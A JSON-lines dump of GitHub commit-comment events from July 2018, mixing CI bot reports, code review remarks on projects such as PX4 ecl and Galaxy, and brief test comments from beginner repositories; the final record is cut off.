{"id":"7963735546","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29703725,"position":null,"line":null,"path":null,"commit_id":"0d4758cfa36bf33e611d2e03605f8dadf3753182","created_at":"2018-07-13T18:40:48Z","updated_at":"2018-07-13T18:40:48Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-365](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-365).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-365-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-13T18:40:48Z"}
{"id":"7963735672","type":"CommitCommentEvent","actor":{"login":"nazpot01"},"repo":{"name":"nazpot01/Spoon-Knife"},"payload":{"comment":{"id":29703726,"position":12,"line":12,"path":"index.html","commit_id":"a30c19e3f13765a3b48829788bc1cb8b4e95cee4","created_at":"2018-07-13T18:40:50Z","updated_at":"2018-07-13T18:40:50Z","author_association":"OWNER","body":"rrewrew"}},"created_at":"2018-07-13T18:40:50Z"}
{"id":"7963735937","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29703729,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-13T18:40:54Z","updated_at":"2018-07-13T18:40:54Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-13T18:40:54Z"}
{"id":"7963736846","type":"CommitCommentEvent","actor":{"login":"tmbb"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":29703733,"position":null,"line":null,"path":null,"commit_id":"35c023174a543090407392f4593db3304c6237a6","created_at":"2018-07-13T18:41:06Z","updated_at":"2018-07-13T18:41:06Z","author_association":"CONTRIBUTOR","body":"I'll add this as a proper issue on the repo (this discussion is hard to find)"}},"created_at":"2018-07-13T18:41:06Z"}
{"id":"7963736976","type":"CommitCommentEvent","actor":{"login":"nazpot01"},"repo":{"name":"nazpot01/Spoon-Knife"},"payload":{"comment":{"id":29703734,"position":null,"line":null,"path":null,"commit_id":"a30c19e3f13765a3b48829788bc1cb8b4e95cee4","created_at":"2018-07-13T18:41:08Z","updated_at":"2018-07-13T18:41:08Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-13T18:41:08Z"}
{"id":"7963741855","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29703747,"position":null,"line":null,"path":null,"commit_id":"e94c9babac891617b828ec1a5f6f44b33dac491b","created_at":"2018-07-13T18:42:11Z","updated_at":"2018-07-13T18:42:11Z","author_association":"NONE","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2311 of 2311 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e94c9babac891617b828ec1a5f6f44b33dac491b-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e94c9babac891617b828ec1a5f6f44b33dac491b-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T18:42:11Z"}
{"id":"7963742067","type":"CommitCommentEvent","actor":{"login":"jrchamp"},"repo":{"name":"tlswg/tls13-rfc"},"payload":{"comment":{"id":29703748,"position":226,"line":633,"path":"rfc8446.xml","commit_id":"3c9387d3db2973319f15162c02e7eca96d73bf00","created_at":"2018-07-13T18:42:13Z","updated_at":"2018-07-13T18:42:13Z","author_association":"NONE","body":"It looks like they've obsoleted 'serieses', so the plural of 'series' is also 'series'. https://en.wiktionary.org/wiki/series#English"}},"created_at":"2018-07-13T18:42:13Z"}
{"id":"7963742340","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29703750,"position":null,"line":null,"path":null,"commit_id":"c0ec85b5b8dc870a51c3631406959d8987ba9b83","created_at":"2018-07-13T18:42:17Z","updated_at":"2018-07-13T18:42:17Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |    -0.13 |\n| `metadata_passing` |    -3    |\n| `metadata_total`   |    -1    |\n| `nodes_count`      |  -717    |\n| `texts_passing`    |    -7    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |   -20000 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0035/__cts__.xml`                            | Deleted  |\n| `./data/tlg0035/tlg001/__cts__.xml`                     | Deleted  |\n| `./data/tlg0035/tlg001/tlg0035.tlg001.perseus-grc2.xml` | Deleted  |\n| `./data/tlg0086/tlg045/__cts__.xml`                     | New      |\n| `./data/tlg0086/tlg045/tlg0086.tlg045.perseus-grc2.xml` | New      |\n| `./data/tlg0561/tlg001/tlg0561.tlg001.perseus-grc1.xml` | New      |\n| `./data/tlg0561/tlg001/tlg0561.tlg001.perseus-grc2.xml` | Deleted  |\n| `./data/tlg0031/tlg024/tlg0031.tlg024.perseus-grc2.xml` | Failing  |\n| `./data/tlg0031/tlg025/tlg0031.tlg025.perseus-eng2.xml` | Failing  |\n| `./data/tlg0031/tlg025/tlg0031.tlg025.perseus-grc2.xml` | Failing  |\n| `./data/tlg0059/tlg004/tlg0059.tlg004.perseus-grc2.xml` | Failing  |\n| `./data/tlg0059/tlg005/tlg0059.tlg005.perseus-eng2.xml` | Failing  |\n| `./data/tlg0086/tlg045/__cts__.xml`                     | Failing  |\n| `./data/tlg0086/tlg045/tlg0086.tlg045.perseus-grc2.xml` | Failing  |\n| `./data/tlg0561/tlg001/__cts__.xml`                     | Failing  |\n| `./data/tlg0561/tlg001/tlg0561.tlg001.perseus-grc1.xml` | Failing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4451)*\n"}},"created_at":"2018-07-13T18:42:17Z"}
{"id":"7963744045","type":"CommitCommentEvent","actor":{"login":"a1ip"},"repo":{"name":"a1ip/Gift-for-my-Granny"},"payload":{"comment":{"id":29703756,"position":null,"line":null,"path":null,"commit_id":"0f6415b33467a1f298ceed4e3920014736440bf1","created_at":"2018-07-13T18:42:41Z","updated_at":"2018-07-13T18:42:41Z","author_association":"OWNER","body":"Добавил замену фона на розовый, а то нечаянно её потерял."}},"created_at":"2018-07-13T18:42:41Z"}
{"id":"7963744523","type":"CommitCommentEvent","actor":{"login":"mikaylatjie"},"repo":{"name":"mikaylatjie/hello-world"},"payload":{"comment":{"id":29703757,"position":null,"line":null,"path":null,"commit_id":"e4a5f888f204189a5b955e022309a10089307a3d","created_at":"2018-07-13T18:42:47Z","updated_at":"2018-07-13T18:42:47Z","author_association":"OWNER","body":"edits for the first pull request"}},"created_at":"2018-07-13T18:42:47Z"}
{"id":"7963749260","type":"CommitCommentEvent","actor":{"login":"a1ip"},"repo":{"name":"a1ip/Gift-for-my-Granny"},"payload":{"comment":{"id":29703772,"position":null,"line":null,"path":null,"commit_id":"80e5c334079e07356962753a769abc7b3bea2f15","created_at":"2018-07-13T18:43:54Z","updated_at":"2018-07-13T18:43:54Z","author_association":"OWNER","body":"Просто скобку фигурную переставил для красоты."}},"created_at":"2018-07-13T18:43:54Z"}
{"id":"7963752760","type":"CommitCommentEvent","actor":{"login":"a1ip"},"repo":{"name":"a1ip/Gift-for-my-Granny"},"payload":{"comment":{"id":29703787,"position":null,"line":null,"path":null,"commit_id":"a552655b19dc523a728c4ce27b3a3a1aa780582f","created_at":"2018-07-13T18:44:42Z","updated_at":"2018-07-13T18:44:42Z","author_association":"OWNER","body":"Добавил возврат к прежнему виду при повторном нажатии кнопки."}},"created_at":"2018-07-13T18:44:42Z"}
{"id":"7963754122","type":"CommitCommentEvent","actor":{"login":"Xpedigo"},"repo":{"name":"mapsplugin/cordova-plugin-googlemaps"},"payload":{"comment":{"id":29703793,"position":null,"line":null,"path":null,"commit_id":"27edba99ff2bce93a2ff0d90faf745e7b53e6799","created_at":"2018-07-13T18:44:58Z","updated_at":"2018-07-13T18:44:58Z","author_association":"NONE","body":"Great fix and improvement of this plugin.\r\nThank you @wf9a5m75 \r\n\r\n"}},"created_at":"2018-07-13T18:44:58Z"}
{"id":"7963754941","type":"CommitCommentEvent","actor":{"login":"medeiva"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29703796,"position":6,"line":6,"path":"lesson4/route.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T18:45:11Z","updated_at":"2018-07-13T18:45:11Z","author_association":"OWNER","body":"всё я оконачательно запуталась. и не понимаю зачем нам что нужно. почему я не могу присвоить     `@start_station = start_station\r\n   @end_station = end_station`\r\n\r\n и зачем мне писать это\r\n`def first_station\r\n  @stations.first\r\nend\r\n`\r\nесли у меня есть attr_reader  :start_station, :end_station"}},"created_at":"2018-07-13T18:45:11Z"}
{"id":"7963755986","type":"CommitCommentEvent","actor":{"login":"counterpoint"},"repo":{"name":"joomla-framework/database"},"payload":{"comment":{"id":29703801,"position":null,"line":null,"path":null,"commit_id":"25508b8608b66a790bc48b04915f6edd29814ff0","created_at":"2018-07-13T18:45:25Z","updated_at":"2018-07-13T18:45:25Z","author_association":"NONE","body":"Thank you"}},"created_at":"2018-07-13T18:45:25Z"}
{"id":"7963757209","type":"CommitCommentEvent","actor":{"login":"dakejahl"},"repo":{"name":"PX4/ecl"},"payload":{"comment":{"id":29703806,"position":12,"line":113,"path":"EKF/control.cpp","commit_id":"f9c8b1e3fb7e0f0d06e36fd46e7e1830f9813d94","created_at":"2018-07-13T18:45:42Z","updated_at":"2018-07-13T18:45:42Z","author_association":"NONE","body":"This will prevent the _rng_hgt_faulty flag from ever updating to true, causing continuous fusing. I have tested this and suggest this change.\r\n```\r\n\t_R_rng_to_earth_2_2 = _R_to_earth(2, 0) * _sin_tilt_rng + _R_to_earth(2, 2) * _cos_tilt_rng;\r\n\r\n\t// Get range data from buffer and check validity\r\n\t_range_data_ready = _range_buffer.pop_first_older_than(_imu_sample_delayed.time_us, &_range_sample_delayed);\r\n\r\n\tcheckRangeDataValidity();\r\n\r\n\tif (_range_data_ready && !_rng_hgt_faulty) {\r\n\t\t// correct the range data for position offset relative to the IMU\r\n\t\tVector3f pos_offset_body = _params.rng_pos_body - _params.imu_pos_body;\r\n\t\tVector3f pos_offset_earth = _R_to_earth * pos_offset_body;\r\n\t\t_range_sample_delayed.rng += pos_offset_earth(2) / _R_rng_to_earth_2_2;\r\n\t}\r\n```\r\n\r\nI tried creating a branch in the ecl but I kept getting error 403, I am guessing it has access restrictions?"}},"created_at":"2018-07-13T18:45:42Z"}
{"id":"7963766742","type":"CommitCommentEvent","actor":{"login":"wf9a5m75"},"repo":{"name":"mapsplugin/cordova-plugin-googlemaps"},"payload":{"comment":{"id":29703825,"position":null,"line":null,"path":null,"commit_id":"27edba99ff2bce93a2ff0d90faf745e7b53e6799","created_at":"2018-07-13T18:47:48Z","updated_at":"2018-07-13T18:47:48Z","author_association":"MEMBER","body":"You're welcome."}},"created_at":"2018-07-13T18:47:48Z"}
{"id":"7963772558","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Omnia-Contentus"},"payload":{"comment":{"id":29703838,"position":null,"line":null,"path":null,"commit_id":"1a8e5776918392eeb3f301399c5dffb419457b2e","created_at":"2018-07-13T18:49:05Z","updated_at":"2018-07-13T18:49:05Z","author_association":"NONE","body":"not committing on my plugin smh\r\n~or is it because I make no mistakes like typos as far as ik?~"}},"created_at":"2018-07-13T18:49:05Z"}
{"id":"7963775759","type":"CommitCommentEvent","actor":{"login":"nsoranzo"},"repo":{"name":"mvdbeek/galaxy"},"payload":{"comment":{"id":29703852,"position":5,"line":473,"path":"lib/galaxy/tools/parameters/dynamic_options.py","commit_id":"491841275678e522ece73c0533974dcf2c46dfb7","created_at":"2018-07-13T18:49:45Z","updated_at":"2018-07-13T18:49:45Z","author_association":"COLLABORATOR","body":"Thanks! I can replicate the issue with:\r\n```python\r\nclass DynamicOptions(object):\r\n    def __init__(self):\r\n        def load_from_parameter():\r\n            obj = self.tool_param\r\n            ret = eval(transform_lines)\r\n            print(ret)\r\n        self.separator = '\\t'\r\n        self.tool_param = ['foo', 'bar']\r\n        load_from_parameter()\r\n\r\ntransform_lines = '[\"%s%s%s\" % (line, self.separator, line) for line in obj]'\r\n\r\nf = DynamicOptions()\r\n```\r\nwhich works on Py2 and fails on Py3. Unfortunately adding `, globals(), locals()` does not fix it for me, I think that the list comprehension creates another context where `self` is not accessible."}},"created_at":"2018-07-13T18:49:45Z"}
{"id":"7963778749","type":"CommitCommentEvent","actor":{"login":"jsirois"},"repo":{"name":"pantsbuild/pants"},"payload":{"comment":{"id":29703867,"position":23,"line":66,"path":"src/python/pants/backend/python/tasks/setup_py.py","commit_id":"a1696c815774552ee14e8df30f5636bb97c2b9e9","created_at":"2018-07-13T18:50:22Z","updated_at":"2018-07-13T18:50:22Z","author_association":"MEMBER","body":"@cosmicexplorer and @CMLivingston this really deserves review from you two.\r\nThe compensation can be seen in:\r\n+ https://github.com/pantsbuild/pants/commit/a1696c815774552ee14e8df30f5636bb97c2b9e9#diff-3cfbbf90f0192505119f46d39ecee504R12\r\n+ https://github.com/pantsbuild/pants/commit/a1696c815774552ee14e8df30f5636bb97c2b9e9#diff-31fdd1e748cf7c1474a3aff7cdef811bR1\r\n\r\nLet me know if I was missing something here re `--universal` application in `SetupPyRunner`."}},"created_at":"2018-07-13T18:50:22Z"}
{"id":"7963779244","type":"CommitCommentEvent","actor":{"login":"medeiva"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29703869,"position":5,"line":4,"path":"lesson4/train.rb","commit_id":"ce92aff26557d0a34a481c4d59163d0129f50506","created_at":"2018-07-13T18:50:28Z","updated_at":"2018-07-13T18:50:28Z","author_association":"OWNER","body":"а зачем передавать тип, если тип для каждого видов поездов автоматически свой? смысл тогда создавать подклассы?"}},"created_at":"2018-07-13T18:50:28Z"}
{"id":"7963779470","type":"CommitCommentEvent","actor":{"login":"ShFil119"},"repo":{"name":"rwengine/openrw"},"payload":{"comment":{"id":29703871,"position":null,"line":null,"path":null,"commit_id":"4f98e363ce5231fec823d4595f574241df972b8c","created_at":"2018-07-13T18:50:31Z","updated_at":"2018-07-13T18:50:31Z","author_association":"CONTRIBUTOR","body":"It causes warning, can we somehow mute it down?"}},"created_at":"2018-07-13T18:50:31Z"}
{"id":"7963781610","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"MOTO-M8916/android_manifest"},"payload":{"comment":{"id":29703877,"position":null,"line":null,"path":null,"commit_id":"8a1ee90a806c85cab12b610f573b5e93911397c1","created_at":"2018-07-13T18:50:58Z","updated_at":"2018-07-13T18:50:58Z","author_association":"NONE","body":":disappointed: "}},"created_at":"2018-07-13T18:50:58Z"}
{"id":"7963782325","type":"CommitCommentEvent","actor":{"login":"Shahnway"},"repo":{"name":"Shahnway/shanhn"},"payload":{"comment":{"id":29703880,"position":2,"line":2,"path":"Main","commit_id":"60d2aeba5025a7dca066352156316d195027eafc","created_at":"2018-07-13T18:51:05Z","updated_at":"2018-07-13T18:51:05Z","author_association":"OWNER","body":"kadjasbd"}},"created_at":"2018-07-13T18:51:05Z"}
{"id":"7963786034","type":"CommitCommentEvent","actor":{"login":"madebr"},"repo":{"name":"rwengine/openrw"},"payload":{"comment":{"id":29703884,"position":null,"line":null,"path":null,"commit_id":"4f98e363ce5231fec823d4595f574241df972b8c","created_at":"2018-07-13T18:51:47Z","updated_at":"2018-07-13T18:51:47Z","author_association":"CONTRIBUTOR","body":"Just replace it with a FIXME."}},"created_at":"2018-07-13T18:51:47Z"}
{"id":"7963786938","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29703888,"position":null,"line":null,"path":null,"commit_id":"fc60ec37dc5f6eede75139df4155203639eefa63","created_at":"2018-07-13T18:51:59Z","updated_at":"2018-07-13T18:51:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [make dummy sprite for bombs. add circle to glow sprite.](https://trello.com/c/pvX4wyx9/43-make-dummy-sprite-for-bombs-add-circle-to-glow-sprite)"}},"created_at":"2018-07-13T18:51:59Z"}
{"id":"7963787004","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29703889,"position":null,"line":null,"path":null,"commit_id":"2041502792dd13bc72cae192f1a6b54cde1d6356","created_at":"2018-07-13T18:52:00Z","updated_at":"2018-07-13T18:52:00Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/2041502792dd13bc72cae192f1a6b54cde1d6356/index.html"}},"created_at":"2018-07-13T18:52:00Z"}
{"id":"7963791344","type":"CommitCommentEvent","actor":{"login":"lorinfields"},"repo":{"name":"LambdaSchool/ML-Reinforcement-Learning"},"payload":{"comment":{"id":29703902,"position":null,"line":null,"path":null,"commit_id":"e72c02a8075d5be383f68e391bb8fea8318b4585","created_at":"2018-07-13T18:52:57Z","updated_at":"2018-07-13T18:52:57Z","author_association":"NONE","body":"I got a late start but here is the first 2 goals. Have a great weekend. Lorin"}},"created_at":"2018-07-13T18:52:57Z"}
{"id":"7963794332","type":"CommitCommentEvent","actor":{"login":"richmont"},"repo":{"name":"richmont/Teste-SDB"},"payload":{"comment":{"id":29703910,"position":null,"line":null,"path":null,"commit_id":"9fcb3a2179aa5df5d7761aa18487dd2c9ba3ec7a","created_at":"2018-07-13T18:53:35Z","updated_at":"2018-07-13T18:53:35Z","author_association":"OWNER","body":"Reduzida a quantidade de linhas de código para ter a mesma função prática. Agora é necessário que todo o acesso seja feito no servidor com PHP e não mais no github pages."}},"created_at":"2018-07-13T18:53:35Z"}
{"id":"7963799368","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29703930,"position":null,"line":null,"path":null,"commit_id":"6689f3ba61ff46e9e7ff4a3ecceedaf563a5a78f","created_at":"2018-07-13T18:54:39Z","updated_at":"2018-07-13T18:54:39Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-735](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-735).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-735-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T18:54:39Z"}
{"id":"7963806948","type":"CommitCommentEvent","actor":{"login":"awoods"},"repo":{"name":"OCFL/spec"},"payload":{"comment":{"id":29703946,"position":null,"line":null,"path":null,"commit_id":"5c78ddef24370b95e733e3966a945c41cc9930a3","created_at":"2018-07-13T18:56:09Z","updated_at":"2018-07-13T18:56:09Z","author_association":"MEMBER","body":"So the question for @OCFL/editors is whether we want to support different version naming conventions for objects under the same storage root or not.\r\n\r\n@rosy1280 , it sounds like you are saying, \"no, all version directories under a single storage root must have the same naming convention.\""}},"created_at":"2018-07-13T18:56:09Z"}
{"id":"7963808413","type":"CommitCommentEvent","actor":{"login":"divyadavid"},"repo":{"name":"divyadavid/second-proj"},"payload":{"comment":{"id":29703948,"position":3,"line":3,"path":"README.md","commit_id":"d11300983e93a2d81bdf1c94c46698a078335196","created_at":"2018-07-13T18:56:27Z","updated_at":"2018-07-13T18:56:27Z","author_association":"OWNER","body":"sssssssssssssssssssssssssssssssssssssssssssssssssssssssss"}},"created_at":"2018-07-13T18:56:27Z"}
{"id":"7963809814","type":"CommitCommentEvent","actor":{"login":"divyadavid"},"repo":{"name":"divyadavid/second-proj"},"payload":{"comment":{"id":29703949,"position":null,"line":null,"path":null,"commit_id":"d11300983e93a2d81bdf1c94c46698a078335196","created_at":"2018-07-13T18:56:45Z","updated_at":"2018-07-13T18:56:45Z","author_association":"OWNER","body":"my commit d113009"}},"created_at":"2018-07-13T18:56:45Z"}
{"id":"7963811351","type":"CommitCommentEvent","actor":{"login":"ldavalos"},"repo":{"name":"ldavalos/Group-ldav"},"payload":{"comment":{"id":29703953,"position":null,"line":null,"path":null,"commit_id":"6b61685171a36f185cbde512286b95e02fd00040","created_at":"2018-07-13T18:57:04Z","updated_at":"2018-07-13T18:57:04Z","author_association":"OWNER","body":"\"THIS IS A TEST\""}},"created_at":"2018-07-13T18:57:04Z"}
{"id":"7963814656","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29703965,"position":null,"line":null,"path":null,"commit_id":"c31e23de8d7f2f21bf99ec3a9b1e057501a0462f","created_at":"2018-07-13T18:57:45Z","updated_at":"2018-07-13T18:57:45Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1687 of 1687 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c31e23de8d7f2f21bf99ec3a9b1e057501a0462f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c31e23de8d7f2f21bf99ec3a9b1e057501a0462f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c31e23de8d7f2f21bf99ec3a9b1e057501a0462f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-13T18:57:45Z"}
{"id":"7963816193","type":"CommitCommentEvent","actor":{"login":"irathore"},"repo":{"name":"noironetworks/charm-neutron-api-plugin-aci"},"payload":{"comment":{"id":29703970,"position":null,"line":null,"path":null,"commit_id":"a8c1d90b572e8d666a336dadd903eca0d6998e1f","created_at":"2018-07-13T18:58:06Z","updated_at":"2018-07-13T18:58:06Z","author_association":"NONE","body":"c. neutron-vlan-ranges is showing incorrectly. \r\n\r\nAlso would it support non-contiguous  vlan range. This is a requirement from Tele2\r\n\r\nhttps://wiki.openstack.org/wiki/Ml2_conf.ini_File. \r\nMultiple ranges can be defined like so: physnet1:1100:1110,physnet1:1001:1010 For upcoming Cisco charm we will have option to set disjoint vlan ranges via juju command"}},"created_at":"2018-07-13T18:58:06Z"}
{"id":"7963819756","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"matthewbauer/nixpkgs"},"payload":{"comment":{"id":29703978,"position":null,"line":null,"path":null,"commit_id":"8f2832a5d79838bcf7c2152179590f21c793c9d6","created_at":"2018-07-13T18:58:50Z","updated_at":"2018-07-13T18:58:50Z","author_association":"OWNER","body":"@lnl7 Not yet but I have planned to have it working by 18.09 :-). The Xcbuild stuff should be good enough now to trick everything into thinking it’s the real thing from Apple."}},"created_at":"2018-07-13T18:58:50Z"}
{"id":"7963823289","type":"CommitCommentEvent","actor":{"login":"ramcq"},"repo":{"name":"endlessm/eos-companion-app-integration"},"payload":{"comment":{"id":29703990,"position":null,"line":null,"path":null,"commit_id":"45377de5b61d6a6b16529f499f841e6b3fe8bee5","created_at":"2018-07-13T18:59:37Z","updated_at":"2018-07-13T18:59:37Z","author_association":"NONE","body":"Why does this link to the SDK at all? Doesn't it use the Ekn Services to access SDK content?"}},"created_at":"2018-07-13T18:59:37Z"}
{"id":"7963824265","type":"CommitCommentEvent","actor":{"login":"Jhonny4"},"repo":{"name":"Jhonny4/myFistGitRepo"},"payload":{"comment":{"id":29703995,"position":null,"line":null,"path":null,"commit_id":"819324272437fde6f35b4e1a86dea8419d5afc25","created_at":"2018-07-13T18:59:50Z","updated_at":"2018-07-13T18:59:50Z","author_association":"OWNER","body":"ARE  YOU DONE?"}},"created_at":"2018-07-13T18:59:50Z"}
{"id":"7963828465","type":"CommitCommentEvent","actor":{"login":"sormuras"},"repo":{"name":"forax/pro"},"payload":{"comment":{"id":29704012,"position":null,"line":null,"path":null,"commit_id":"fa6362f5c3e016788e7d557cace8d682d7b51c5c","created_at":"2018-07-13T19:00:44Z","updated_at":"2018-07-13T19:00:44Z","author_association":"COLLABORATOR","body":"Using `openjdk11` and `oraclejdk11` will work.\r\n`-ea` auto-switched to `jdk-12-ea+2` today."}},"created_at":"2018-07-13T19:00:44Z"}
{"id":"7963833681","type":"CommitCommentEvent","actor":{"login":"Mandaha"},"repo":{"name":"Jhonny4/myFistGitRepo"},"payload":{"comment":{"id":29704029,"position":null,"line":null,"path":null,"commit_id":"819324272437fde6f35b4e1a86dea8419d5afc25","created_at":"2018-07-13T19:01:54Z","updated_at":"2018-07-13T19:01:54Z","author_association":"COLLABORATOR","body":"yes"}},"created_at":"2018-07-13T19:01:54Z"}
{"id":"7963844636","type":"CommitCommentEvent","actor":{"login":"jfoclpf"},"repo":{"name":"jfoclpf/autocosts"},"payload":{"comment":{"id":29704052,"position":4,"line":74,"path":"src/css/style.css","commit_id":"b920bbd744248df57c92694450c2b8b57f77752e","created_at":"2018-07-13T19:04:27Z","updated_at":"2018-07-13T19:04:27Z","author_association":"OWNER","body":"Hi @mcristaldo :) any special reason for deleting this part of the code?\r\nIt hides the spin arrows up and down, \r\nhttps://stackoverflow.com/questions/3790935/can-i-hide-the-html5-number-input-s-spin-box\r\nmay I reinsert it?"}},"created_at":"2018-07-13T19:04:27Z"}
{"id":"7963848551","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29704061,"position":null,"line":null,"path":null,"commit_id":"48b0da91073b699cc6822229f2962a0cf76df6a3","created_at":"2018-07-13T19:05:19Z","updated_at":"2018-07-13T19:05:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [implement changing of objects with rightclick in debugging mode](https://trello.com/c/xiyHrgT5/41-implement-changing-of-objects-with-rightclick-in-debugging-mode)"}},"created_at":"2018-07-13T19:05:19Z"}
{"id":"7963848774","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29704062,"position":null,"line":null,"path":null,"commit_id":"c0a0206001ab2dd02abe6d53c5b5c9372578b1c5","created_at":"2018-07-13T19:05:23Z","updated_at":"2018-07-13T19:05:23Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-741](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-741).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-741-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T19:05:23Z"}
{"id":"7963849989","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29704065,"position":null,"line":null,"path":null,"commit_id":"a02e24aa87ece29ab84577a992cdf0347030cdca","created_at":"2018-07-13T19:05:40Z","updated_at":"2018-07-13T19:05:40Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |    -0.06 |\n| `metadata_passing` |    -2    |\n| `metadata_total`   |    -1    |\n| `nodes_count`      |  -714    |\n| `texts_passing`    |    -1    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |   -18499 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0035/__cts__.xml`                            | Deleted  |\n| `./data/tlg0035/tlg001/__cts__.xml`                     | Deleted  |\n| `./data/tlg0035/tlg001/tlg0035.tlg001.perseus-grc2.xml` | Deleted  |\n| `./data/tlg0086/tlg045/__cts__.xml`                     | New      |\n| `./data/tlg0086/tlg045/tlg0086.tlg045.perseus-grc2.xml` | New      |\n| `./data/tlg0561/tlg001/tlg0561.tlg001.perseus-grc1.xml` | New      |\n| `./data/tlg0561/tlg001/tlg0561.tlg001.perseus-grc2.xml` | Deleted  |\n| `./data/tlg0086/tlg045/__cts__.xml`                     | Passing  |\n| `./data/tlg0086/tlg045/tlg0086.tlg045.perseus-grc2.xml` | Passing  |\n| `./data/tlg0561/tlg001/__cts__.xml`                     | Failing  